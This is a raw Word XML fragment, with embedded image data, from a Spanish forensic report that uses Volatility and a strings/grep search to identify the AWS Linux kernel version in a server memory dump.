wtad6hK/26Z14uLs7PlW1BZejuPAMb9XEOHPjzuT5uwxb9+HB0R6ztHei3&#10;cgUjLWI46LyPpBH32pturF0dSYVJa3BeOhRHx5Y0s7PDafRArCrm47Ji1JAhq+cw8qPZzJvc6OUf&#10;bPc4iC1rL1CkdOpDBnVpvuGGy4bfqTl9BXPHOdLS3onB33/DiLq/s3PJPu7mvZM/G/9MvgshhBBC&#10;CJGVBPxCvCqqojS1bwBngonI0gP8OOg0Fw0aYmWbYc34gtZMPuHONv8Mm+dULAqk/F2ph0dZNXYT&#10;58368uk2F75ZOx77Rm9TOGMAmXiFXbog90m5Mjzes41jL+je18aZUnfMXL7etoRRVvdwGzWcz93v&#10;pdwY+JvguYMZOe0QT6yG84nrBpy3fMnYwZZUKJaPSDUhmoAjkdy/F4Wvd3T6HPt803Dtp4143Mk4&#10;Nv4RAbPeZ9KyKKqN+4LlWxbRv8ZFXPoMZZn3w5R99OCfynchhBBCCCGyUNlbtU1r6acuJ3Uu9Nyz&#10;H3RKxb/sclVCiNeRusYIXI53xa99d5yDM0y6V5vRf/8RJt6Zis3AffkYni+EEEIIIYR4HUgPvxD/&#10;IaoiFanVpBa12/Th401jKLVzGa5n/skn7AkhhBBCCCFelRcG/PkYkCuEeAMYNhzAZ/t24PLTaKoG&#10;LmLClKPk+HB+IYQQQgghxBsrxyH9Sb+WlCH9QgghhBBCCCHEGyfHIf3S8SeEEEIIIYQQQryZngv4&#10;NYkv/3xsIYQQQgghhBBC/JPg/wFRfyZBxssopQAAAABJRU5ErkJgglBLAwQUAAYACAAAACEAArhe&#10;i98AAAAHAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBSE74L/YXmCN7vZxmqN2ZRS1FMRbAXx&#10;9pp9TUKzb0N2m6T/3vWkx2GGmW/y1WRbMVDvG8ca1CwBQVw603Cl4XP/ercE4QOywdYxabiQh1Vx&#10;fZVjZtzIHzTsQiViCfsMNdQhdJmUvqzJop+5jjh6R9dbDFH2lTQ9jrHctnKeJA/SYsNxocaONjWV&#10;p93ZangbcVyn6mXYno6by/d+8f61VaT17c20fgYRaAp/YfjFj+hQRKaDO7PxotUQjwQN9+kjiOgu&#10;F08KxEHDXKUJyCKX//mL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3xNsQjgMAAB0IAAAOAAAAAAAAAAAAAAAAADoCAABkcnMvZTJvRG9jLnhtbFBLAQItAAoA&#10;AAAAAAAAIQBbvlpgPakAAD2pAAAUAAAAAAAAAAAAAAAAAPQFAABkcnMvbWVkaWEvaW1hZ2UxLnBu&#10;Z1BLAQItABQABgAIAAAAIQACuF6L3wAAAAcBAAAPAAAAAAAAAAAAAAAAAGOvAABkcnMvZG93bnJl&#10;di54bWxQSwECLQAUAAYACAAAACEAqiYOvrwAAAAhAQAAGQAAAAAAAAAAAAAAAABvsAAAZHJzL19y&#10;ZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAABisQAAAAA=&#10;">
                <v:shape id="_x0000_s1045" type="#_x0000_t202" style="position:absolute;left:258;top:7912;width:5396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6VyzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsRub2oa021KKgnopxl56e2Rfs9Hs27C7aeO/dwXB4zAz3zCrzWg7cSYfWscKHiYZ&#10;COLa6ZYbBYeP5/sCRIjIGjvHpOCbAmzW11crLLW78Dudq9iIBOFQogITY19KGWpDFsPE9cTJOzlv&#10;MSbpG6k9XhLcdnKaZXNpseW0YLCnnaH6qxqsgv3suDd3w+npbTvL/eth2M0/m0qp25txuwQRaYz/&#10;4b/2i1ZQ5ItFMS0ec/i9lO6AXP8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAn+OlcswA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="44878F9F" w14:textId="5FB44628" w:rsidR="00D54AC2" w:rsidRPr="00831684" w:rsidRDefault="00831684" w:rsidP="00831684">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>10</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="37" w:name="_Toc155782577"/>
                        <w:r w:rsidRPr="00250571">
                          <w:t>Captura Imageinfo.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="37"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Imagen 7" o:spid="_x0000_s1046" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:54552;height:7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SqKxwAAAOEAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9da8Iw&#10;FH0X9h/CHfgiM2lhulWjjIFsyHyYbsPHS3PXljU3Jcm0+uuXgeDj4XzPl71txYF8aBxryMYKBHHp&#10;TMOVho/d6u4BRIjIBlvHpOFEAZaLm8EcC+OO/E6HbaxECuFQoIY6xq6QMpQ1WQxj1xEn7tt5izFB&#10;X0nj8ZjCbStzpSbSYsOpocaOnmsqf7a/VsM5ZtJuXj7taHN/nuy/fKDH9ZvWw9v+aQYiUh+v4ov7&#10;1aT5Sk2zPM/h/1GCIBd/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHY9KorHAAAA4QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId107" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00542C58" w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A continuación, procedemos a buscar el perfil con volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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542C58" w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el comando imageinfo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A46880" w14:textId="2A5D69C9" w:rsidR="00DD6454" w:rsidRDefault="00DD6454" w:rsidP="00CE15AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD6454">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6454">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DD6454">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155716489 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DD6454">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00DD6454">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>III.  Comando linux_imageinfo.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6454">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C58E78" w14:textId="3D1FA0A3" w:rsidR="00CE15AE" w:rsidRPr="00CE15AE" w:rsidRDefault="00542C58" w:rsidP="00CE15AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como se puede observar en la imagen anterior, no hemos llegado a encontrar un perfil concreto con </w:t>
      </w:r>
      <w:r w:rsidRPr="004B3C7C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>imageinfo</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, eso se debe a que el perfil creado no es el que se encuentra dentro de las conocidas en la base de datos de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Por ello procedemos a buscar dentro de la memoria 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542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> un string que tenga la cadena de texto "linux version". para ello ejecutamos el comando </w:t>
      </w:r>
      <w:r w:rsidR="00B951D9" w:rsidRPr="00B951D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>strings '/home/jrodg85/Server_RAM.mem' | grep -Ei "linux version" | uniq</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D52A79" w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04240429" w14:textId="6B73C2BF" w:rsidR="00542C58" w:rsidRPr="00542C58" w:rsidRDefault="00542C58" w:rsidP="00B951D9">
      <w:r w:rsidRPr="00542C58">
        <w:t xml:space="preserve">Podemos observar en la imagen anterior que el sistema operativo que utiliza en nuestro caso es un sistema operativo Linux para Amazon Web </w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8">
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:t xml:space="preserve">, concretamente el sistema operativo es el </w:t>
      </w:r>
      <w:r w:rsidRPr="00345434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.15.0-1021.21-aws 4.15.18</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:t xml:space="preserve">. Esta </w:t>
      </w:r>
      <w:r w:rsidR="00345434" w:rsidRPr="00542C58">
        <w:t>versión</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="00345434" w:rsidRPr="00542C58">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:t xml:space="preserve"> es muy usada para las instancias de </w:t>
      </w:r>
      <w:r w:rsidRPr="00345434">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidR="00345434">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00345434" w:rsidRPr="005F4CA6">
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="005F4CA6">
        <w:t>delante</w:t>
      </w:r>
      <w:r w:rsidR="00345434" w:rsidRPr="005F4CA6">
        <w:t xml:space="preserve"> AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00345434">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00345434">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E35AB0" w14:textId="338112D5" w:rsidR="002D5E49" w:rsidRPr="002D5E49" w:rsidRDefault="00831684" w:rsidP="002D5E49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251889664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29B968F7" wp14:editId="18C4EB87">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>263</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5405935" cy="883920"/>
                <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1103376245" name="Grupo 17"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5405935" cy="883920"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5405935" cy="883920"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1787486018" name="Imagen 8" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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157980" cy="883920"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1151415723" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4295955" y="120769"/>
                            <a:ext cx="1109980" cy="546735"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4584C311" w14:textId="5066CB62" w:rsidR="00B951D9" w:rsidRPr="00243EA7" w:rsidRDefault="00B951D9" w:rsidP="00B951D9">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>11</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="38" w:name="_Toc155782578"/>
                              <w:r w:rsidRPr="00C466EA">
                                <w:t>Búsqueda string linux_version</w:t>
                              </w:r>
                              <w:r>
                                <w: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B968F7" id="Grupo 17" o:spid="_x0000_s1047" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:425.65pt;height:69.6pt;z-index:251889664;mso-position-horizontal:left;mso-position-horizontal-relative:margin" coordsize="54059,8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&#10;qZWKLYpy0pFTHkmnttV5Ukf6u2Yj3sW2C4syPKs